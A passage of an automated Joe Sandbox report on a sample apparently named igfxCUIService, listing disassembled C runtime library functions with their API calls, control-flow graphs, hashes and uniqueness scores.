                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$std::locale::_$H_prolog3InitSetgloballocaleYarn___std_exception_copy
                                  • String ID:
                                  • API String ID: 2837286730-0
                                  • Opcode ID: d19f6f3ada3d72de7840b2415c82e4d8402d84c89a5288444823ce6f29d4713c
                                  • Instruction ID: 869147ab5bd83997f9851e61729a313e12aa41cf7e5c66348b883b5529878fc0
                                  • Opcode Fuzzy Hash: d19f6f3ada3d72de7840b2415c82e4d8402d84c89a5288444823ce6f29d4713c
                                  • Instruction Fuzzy Hash: C6317CB0A00605AFE700DF64D959B5AFBF4FB44714F104629E4199BB80DBB6A968CBE0
                                  Uniqueness

                                  Uniqueness Score: 0.39%

                                  Function 00D48E5D, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1224 d48e5d-d48e83 call d48bf2 1227 d48e85-d48e97 call d542a4 1224->1227 1228 d48edc-d48edf 1224->1228 1230 d48e9c-d48ea1 1227->1230 1230->1228 1231 d48ea3-d48edb 1230->1231
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __wsopen_s
                                  • String ID:
                                  • API String ID: 3347428461-0
                                  • Opcode ID: 00bab20c30985b6e63b63a9b1d7fd1d4c7bc13a49a723728d534f64452207871
                                  • Instruction ID: 67fa4603c1823b38617b595d35787be4f1c992211447156d5d5315041ae842d0
                                  • Opcode Fuzzy Hash: 00bab20c30985b6e63b63a9b1d7fd1d4c7bc13a49a723728d534f64452207871
                                  • Instruction Fuzzy Hash: 27113371A0420AAFCB05DF59E94198F7BF4EF48344F0440A9F808EB311DA70EA159B64
                                  Uniqueness

                                  Uniqueness Score: 0.30%

                                  Function 00D4C6D1, Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1232 d4c6d1-d4c6de call d46876 1234 d4c6e3-d4c6ee 1232->1234 1235 d4c6f4-d4c6fc 1234->1235 1236 d4c6f0-d4c6f2 1234->1236 1237 d4c73f-d4c74b call d468d3 1235->1237 1238 d4c6fe-d4c702 1235->1238 1236->1237 1239 d4c704-d4c739 call d49972 1238->1239 1244 d4c73b-d4c73e 1239->1244 1244->1237
                                  APIs
                                    • Part of subcall function 00D46876: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00D4710F,00000001,00000364,00000006,000000FF,?,?,?,00D4185C,00D46950), ref: 00D468B7
                                  • _free.LIBCMT ref: 00D4C740
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap_free
                                  • String ID:
                                  • API String ID: 614378929-0
                                  • Opcode ID: a30e8605a2eb8de14869478dd35ca90c301679f309bffa3130f202b4217855f8
                                  • Instruction ID: 9dc214911729c2fff4b96e95f2cc99b83e29e7b85ab856371256cc9c1a75d68e
                                  • Opcode Fuzzy Hash: a30e8605a2eb8de14869478dd35ca90c301679f309bffa3130f202b4217855f8
                                  • Instruction Fuzzy Hash: 170168B2600356ABC720CFA8C88199EFB98EB053B0F15026DF456B76C0E770AC00CBB0
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  Function 00D40E6F, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a4ef9a211567bd6a44e3aff3fe788fc3b70a48939546757e152cccebadd786a5
                                  • Instruction ID: dc1d47fe321c9c294b2774a6f6504829f7746144925d9706506d0aa6f7742a62
                                  • Opcode Fuzzy Hash: a4ef9a211567bd6a44e3aff3fe788fc3b70a48939546757e152cccebadd786a5
                                  • Instruction Fuzzy Hash: 84F028365017145BC7213A39CC09B9B3BA8CF92334F140B25FB65931D1CB74D81286F5
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 00D46876, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00D4710F,00000001,00000364,00000006,000000FF,?,?,?,00D4185C,00D46950), ref: 00D468B7
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 01d6aa05c5ee59d2cb69bb97fd3bcca0df09fb56ad90f5f2173a43d4fb71549d
                                  • Instruction ID: a7484a8d90de4b0bebc0a5dbed6434f85c6f77efd6417b14b1d12c9fb3bde30d
                                  • Opcode Fuzzy Hash: 01d6aa05c5ee59d2cb69bb97fd3bcca0df09fb56ad90f5f2173a43d4fb71549d
                                  • Instruction Fuzzy Hash: 7CF0823160462567DF316B66EC09F6A7B48EF43760B1C4122FC0AE61D4CA70ED1596F2
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 00D4690D, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000,?,?,?,00D348E0,?,?,00D28B4A,?,?,00D11154), ref: 00D4693F
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 1bde82ae9e5cf839eca606e9d6e409c108fc2d114e9fb209a477ec7dfed1bc2d
                                  • Instruction ID: 6559e850523135d4520cd7255c664cdb7cb3dc5b698284210da61909b9c70424
                                  • Opcode Fuzzy Hash: 1bde82ae9e5cf839eca606e9d6e409c108fc2d114e9fb209a477ec7dfed1bc2d
                                  • Instruction Fuzzy Hash: 77E06D3120462167DA212A6A9C04B5A3A48DF43BB0F1D0520FC5AE61D8DBF0DC408AB3
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 00D53CC1, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • CreateFileW.KERNELBASE(00000000,00000000,?,00D54023,?,?,00000000,?,00D54023,00000000,0000000C), ref: 00D53CDE
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: d6b3dc222e73b55eca19ea42479767244f2a2dc2e6951a4f1852bf436a396f31
                                  • Instruction ID: 9679a0edfe8a20d8fca9f0e389a87de64e2bb2f7527a56a020e8da9bf526cc7d
                                  • Opcode Fuzzy Hash: d6b3dc222e73b55eca19ea42479767244f2a2dc2e6951a4f1852bf436a396f31
                                  • Instruction Fuzzy Hash: 59D06C3201020DBBDF028F88DC06EDA3FAAFB48715F014100BE1896160C732E861EB91
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  Function 00D35E7F, Relevance: 1.5, APIs: 1, Instructions: 12COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • RtlEncodePointer.NTDLL(?,?,00D3591B,00D35961,?,00D357A8,00000000,00000000,00000000,00000004,00D288A0,00000001,00000008,00000000,00000000,F0B87680), ref: 00D35E92
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: EncodePointer
                                  • String ID:
                                  • API String ID: 2118026453-0
                                  • Opcode ID: 199225d979ebcecb0c1e3711930e28f4270950c0a393b1c459aec8b1cc8b4564
                                  • Instruction ID: f2928a237bae6336b3929accaff57ec79ef6c43d27bf93056bbb17b8e39a7d7f
                                  • Opcode Fuzzy Hash: 199225d979ebcecb0c1e3711930e28f4270950c0a393b1c459aec8b1cc8b4564
                                  • Instruction Fuzzy Hash: D8D0C9B8048B049BEB04AF48FC4AB103BA5E306301F000029E94CC23B1D7F15494CA74
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  Non-executed Functions

                                  Function 00D360A8, Relevance: 143.7, APIs: 41, Strings: 41, Instructions: 167libraryloaderUNIQUE
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00D360AE
                                  • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00D360BC
                                  • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00D360CD
                                  • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00D360DE
                                  • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00D360EF
                                  • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00D36100
                                  • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 00D36111
                                  • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00D36122
                                  • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 00D36133
                                  • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00D36144
                                  • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00D36155
                                  • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00D36166
                                  • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00D36177
                                  • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00D36188
                                  • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00D36199
                                  • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00D361AA
                                  • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00D361BB
                                  • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00D361CC
                                  • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 00D361DD
                                  • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 00D361EE
                                  • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 00D361FF
                                  • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00D36210
                                  • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 00D36221
                                  • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 00D36232
                                  • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 00D36243
                                  • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00D36254
                                  • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00D36265
                                  • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 00D36276
                                  • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00D36287
                                  • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00D36298
                                  • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 00D362A9
                                  • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00D362BA
                                  • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 00D362CB
                                  • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00D362DC
                                  • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 00D362ED
                                  • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 00D362FE
                                  • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 00D3630F
                                  • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 00D36320
                                  • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 00D36331
                                  • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 00D36342
                                  • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 00D36353
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$HandleModule
                                  • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                  • API String ID: 667068680-295688737
                                  • Opcode ID: 0f3e1c95d4aa65c9a6eadfed4bb6cd54edd6ec3acab9079c32985b479cf1bbaa
                                  • Instruction ID: 9a99932e41a9c1b63dac71ec07916618dc7037d78f7eabc1bb27d38f77246b8a
                                  • Opcode Fuzzy Hash: 0f3e1c95d4aa65c9a6eadfed4bb6cd54edd6ec3acab9079c32985b479cf1bbaa
                                  • Instruction Fuzzy Hash: DB613371962B20AFDB005FBCBC0D89A3EA8EA097573009627FD16D23A4D7F4444CAB75
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00D4EAAA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetLocaleInfoW.KERNEL32(00000000,2000000B,00D4EDC8,00000002,00000000,?,?,?,00D4EDC8,?,00000000), ref: 00D4EB43
                                  • GetLocaleInfoW.KERNEL32(00000000,20001004,00D4EDC8,00000002,00000000,?,?,?,00D4EDC8,?,00000000), ref: 00D4EB6C
                                  • GetACP.KERNEL32(?,?,00D4EDC8,?,00000000), ref: 00D4EB81
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID: ACP$OCP
                                  • API String ID: 2299586839-711371036
                                  • Opcode ID: c18cdadd9f92abef2ed8af2cd7f15696739995d8be92448d6914b6b4b94f7f3a
                                  • Instruction ID: 89ff382282f6744db5469905f9e01c2d769aa10a15f6f8f3605c0469d0acb83e
                                  • Opcode Fuzzy Hash: c18cdadd9f92abef2ed8af2cd7f15696739995d8be92448d6914b6b4b94f7f3a
                                  • Instruction Fuzzy Hash: 1A21B022A00211FBDB348F59CD45AA7B3A6FF54B68B5E8524E94BD7210E732ED41C3B0
                                  Uniqueness

                                  Uniqueness Score: 0.03%

                                  Function 00D4EC7F, Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00D46F6D: GetLastError.KERNEL32(00000008,?,00000000,00D4C55A,00D3591B,00D35961,?,00D357A8,00000000), ref: 00D46F72
                                    • Part of subcall function 00D46F6D: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00D357A8,00000000), ref: 00D47010
                                    • Part of subcall function 00D46F6D: _free.LIBCMT ref: 00D46FCF
                                    • Part of subcall function 00D46F6D: _free.LIBCMT ref: 00D47005
                                  • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00D4ED8B
                                  • IsValidCodePage.KERNEL32(00000000), ref: 00D4EDD4
                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00D4EDE3
                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00D4EE2B
                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00D4EE4A
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                  • String ID:
                                  • API String ID: 949163717-0
                                  • Opcode ID: 5ec1c0e1fd73fd52a489ca051728abd56d63a753198d2f0fe486422caec35b3d
                                  • Instruction ID: f4be624ca3ffd75e2ae44c078aed0d8794558e6fa01650552d538351c67bbbd7
                                  • Opcode Fuzzy Hash: 5ec1c0e1fd73fd52a489ca051728abd56d63a753198d2f0fe486422caec35b3d
                                  • Instruction Fuzzy Hash: 13516D72E00215BFDB20EFA5CC41ABAB7B8FF08700F184529E915E7290EB709A44CB71
                                  Uniqueness

                                  Uniqueness Score: 0.13%

                                  Function 00D4E31E, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00D46F6D: GetLastError.KERNEL32(00000008,?,00000000,00D4C55A,00D3591B,00D35961,?,00D357A8,00000000), ref: 00D46F72
                                    • Part of subcall function 00D46F6D: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00D357A8,00000000), ref: 00D47010
                                  • GetACP.KERNEL32(?,?,?,?,?,?,00D44253,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00D4E3DF
                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00D44253,?,?,?,00000055,?,-00000050,?,?), ref: 00D4E40A
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00D4E56D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$CodeInfoLocalePageValid
                                  • String ID: utf8
                                  • API String ID: 607553120-905460609
                                  • Opcode ID: a994cbe30b3da4ed09e72aca861505a9c3fdf024e5a4e590983090a0d7268ec3
                                  • Instruction ID: 42411b00dc7a747ae9aa32a2dcce24725917c627ba9de5e7ca2962ab0ffeb4f5
                                  • Opcode Fuzzy Hash: a994cbe30b3da4ed09e72aca861505a9c3fdf024e5a4e590983090a0d7268ec3
                                  • Instruction Fuzzy Hash: 9371C372A00306BBDB25AF75CC8ABAB73A8FF49704F184429F945DB181FB74E9408671
                                  Uniqueness

                                  Uniqueness Score: 6.12%

                                  Function 00D4B17F, Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4c3b0b10dae3f9ee04aaeaf0cfa5d2f0f01c55839207f593d39e6bdc1a8d57bd
                                  • Instruction ID: e8fbe8e6f621f069d770dabe49de2456b31f982859047ee23f9ea6ff490e83de
                                  • Opcode Fuzzy Hash: 4c3b0b10dae3f9ee04aaeaf0cfa5d2f0f01c55839207f593d39e6bdc1a8d57bd
                                  • Instruction Fuzzy Hash: 0631C676900219AFCB24EFA9CC89DBBB7B9EB94320F544159F90597240EA70ED408B74
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 00D457A0, Relevance: 22.9, APIs: 15, Instructions: 357COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$Info
                                  • String ID:
                                  • API String ID: 2509303402-0
                                  • Opcode ID: 8e963f0cf4143bb3e372aff129965d48a965bffe649cc70b2830f44b7f21ff68
                                  • Instruction ID: d45951495d11b42767c841d0f2e254534e827c5d41a4e8e911421a494cdd1a41
                                  • Opcode Fuzzy Hash: 8e963f0cf4143bb3e372aff129965d48a965bffe649cc70b2830f44b7f21ff68
                                  • Instruction Fuzzy Hash: CFD1AB71E007059FDB21DFA8D881BAEBBF5FF09310F184169E895AB282D774A945CB70
                                  Uniqueness

                                  Uniqueness Score: 0.67%

                                  Function 00D4D905, Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • ___free_lconv_mon.LIBCMT ref: 00D4D949
                                    • Part of subcall function 00D4CB05: _free.LIBCMT ref: 00D4CB22
                                    • Part of subcall function 00D4CB05: _free.LIBCMT ref: 00D4CB34
                                    • Part of subcall function 00D4CB05: _free.LIBCMT ref: 00D4CB46
                                    • Part of subcall function 00D4CB05: _free.LIBCMT ref: 00D4CB58
                                    • Part of subcall function 00D4CB05: _free.LIBCMT ref: 00D4CB6A
                                    • Part of subcall function 00D4CB05: _free.LIBCMT ref: 00D4CB7C
                                    • Part of subcall function 00D4CB05: _free.LIBCMT ref: 00D4CB8E
                                    • Part of subcall function 00D4CB05: _free.LIBCMT ref: 00D4CBA0
                                    • Part of subcall function 00D4CB05: _free.LIBCMT ref: 00D4CBB2
                                    • Part of subcall function 00D4CB05: _free.LIBCMT ref: 00D4CBC4
                                    • Part of subcall function 00D4CB05: _free.LIBCMT ref: 00D4CBD6
                                    • Part of subcall function 00D4CB05: _free.LIBCMT ref: 00D4CBE8
                                    • Part of subcall function 00D4CB05: _free.LIBCMT ref: 00D4CBFA
                                  • _free.LIBCMT ref: 00D4D93E
                                    • Part of subcall function 00D468D3: HeapFree.KERNEL32(00000000,00000000,?,00D4D25C,?,00000000,?,?,?,00D4D4FF,?,00000007,?,?,00D4DA9C,?), ref: 00D468E9
                                    • Part of subcall function 00D468D3: GetLastError.KERNEL32(?,?,00D4D25C,?,00000000,?,?,?,00D4D4FF,?,00000007,?,?,00D4DA9C,?,?), ref: 00D468FB
                                  • _free.LIBCMT ref: 00D4D960
                                  • _free.LIBCMT ref: 00D4D975
                                  • _free.LIBCMT ref: 00D4D980
                                  • _free.LIBCMT ref: 00D4D9A2
                                  • _free.LIBCMT ref: 00D4D9B5
                                  • _free.LIBCMT ref: 00D4D9C3
                                  • _free.LIBCMT ref: 00D4D9CE
                                  • _free.LIBCMT ref: 00D4DA06
                                  • _free.LIBCMT ref: 00D4DA0D
                                  • _free.LIBCMT ref: 00D4DA2A
                                  • _free.LIBCMT ref: 00D4DA42
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
